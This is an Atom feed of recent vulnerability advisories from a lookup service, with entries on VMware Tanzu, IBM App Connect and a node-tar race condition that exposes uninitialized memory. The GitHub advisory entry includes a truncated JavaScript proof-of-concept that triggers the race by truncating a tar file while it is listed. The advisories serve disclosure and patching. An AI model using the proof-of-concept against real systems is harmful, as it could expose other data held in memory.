<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-04T06:42:15.017270+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/bdu:2026-01714</id>
    <title>bdu:2026-01714</title>
    <updated>2026-10-04T06:42:15.100910+00:00</updated>
    <content>bdu:2026-01714</content>
    <link href="https://cve.radiocsirt.org/vuln/bdu:2026-01714"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/certfr-2026-avi-0266</id>
    <title>certfr-2026-avi-0266 — De multiples vulnérabilités ont été découvertes dans VMware Tanzu. Elles permettent à un attaquant de provoquer un prob…</title>
    <updated>2026-10-04T06:42:15.100947+00:00</updated>
    <content>certfr-2026-avi-0266</content>
    <link href="https://cve.radiocsirt.org/vuln/certfr-2026-avi-0266"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-257303</id>
    <title>EUVD-2026-257303</title>
    <updated>2026-10-04T06:42:15.100966+00:00</updated>
    <content>EUVD-2026-257303</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-257303"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2025-64118</id>
    <title>fkie_cve-2025-64118</title>
    <updated>2026-10-04T06:42:15.100978+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>node-tar is a Tar for Node.js. In 7.5.1, using .t (aka .list) with { sync: true } to read tar entry contents returns uninitialized memory contents if tar file was changed on disk to a smaller size while being read. This vulnerability is fixed in 7.5.2.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2025-64118"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-29xp-372q-xqph</id>
    <title>GHSA-29xp-372q-xqph — node-tar has a race condition leading to uninitialized memory exposure</title>
    <updated>2026-10-04T06:42:15.101006+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> npm: tar</p>
<p>### Summary</p>
<p>Using `.t` (aka `.list`) with `{ sync: true }` to read tar entry contents returns uninitialized memory contents if tar file was changed on disk to a smaller size while being read.</p>
<p>### Details</p>
<p>See:
* https://github.com/isaacs/node-tar/issues/445
* https://github.com/isaacs/node-tar/pull/446
* Regression happened in https://github.com/isaacs/node-tar/commit/5330eb04bc43014f216e5c271b40d5c00d45224d</p>
<p>### PoC</p>
<p>A:
```js
import * as tar from 'tar'
import fs from 'node:fs'</p>
<p>fs.writeFileSync('tar.test.tmp', Buffer.alloc(1*1024))</p>
<p>// from readme
const filesAdded = []
tar.c(
  {
    sync: true,
    file: 'tar.test.tmp.tar',
    onWriteEntry(entry) {
      // initially, it's uppercase and 0o644
      console.log('adding', entry.path, entry.stat.mode.toString(8))
      // make all the paths lowercase
      entry.path = entry.path.toLowerCase()
      // make the entry executable
      entry.stat.mode = 0o755
      // in the archive, it's lowercase and 0o755
      filesAdded.push([entry.path, entry.stat.mode.toString(8)])
    },
  },
  ['./tar.test.tmp'],
)</p>
<p>const a = fs.readFileSync('tar.test.tmp.tar')</p>
<p>for (let i = 0; ; i++){
  if (i % 10000 === 0) console.log(i)
  fs.writeFileSync('tar.test.tmp.tar', a)
  fs.truncateSync('tar.test.tmp.tar', 600)
}
```</p>
<p>B (vulnerable):
```js
import * as tar from 'tar'
import * as fs from 'fs'</p>
<p>while (true) {
  fs.readFileSync(import.meta.filename)
  tar.t({
    sync: true,
    file: 'tar.test.tmp.tar',
    onReadEntry: e =&gt; e.on('data', b…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-29xp-372q-xqph"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ubuntu-cve-2025-64118</id>
    <title>UBUNTU-CVE-2025-64118</title>
    <updated>2026-10-04T06:42:15.101064+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Ubuntu:Pro:14.04:LTS: node-tar, Ubuntu:Pro:16.04:LTS: node-tar, Ubuntu:18.04:LTS: node-tar, Ubuntu:Pro:20.04:LTS: node-tar, Ubuntu:22.04:LTS: node-tar, Ubuntu:24.04:LTS: node-tar, Ubuntu:25.10: node-tar, Ubuntu:26.04:LTS: node-tar</p>
<p>node-tar is a Tar for Node.js. In 7.5.1, using .t (aka .list) with { sync: true } to read tar entry contents returns uninitialized memory contents if tar file was changed on disk to a smaller size while being read. This vulnerability is fixed in 7.5.2.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ubuntu-cve-2025-64118"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/wid-sec-w-2025-2681</id>
    <title>WID-SEC-W-2025-2681 — IBM App Connect Enterprise: Mehrere Schwachstellen</title>
    <updated>2026-10-04T06:42:15.101094+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Ein Angreifer kann mehrere Schwachstellen in IBM App Connect Enterprise ausnutzen, um Sicherheitsmaßnahmen zu umgehen und Cross-Site-Scripting- oder Open-Redirect-Angriffe durchzuführen, einen Denial-of-Service-Zustand herbeizuführen, Daten zu manipulieren oder vertrauliche Informationen offenzulegen.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/wid-sec-w-2025-2681"/>
  </entry>
</feed>
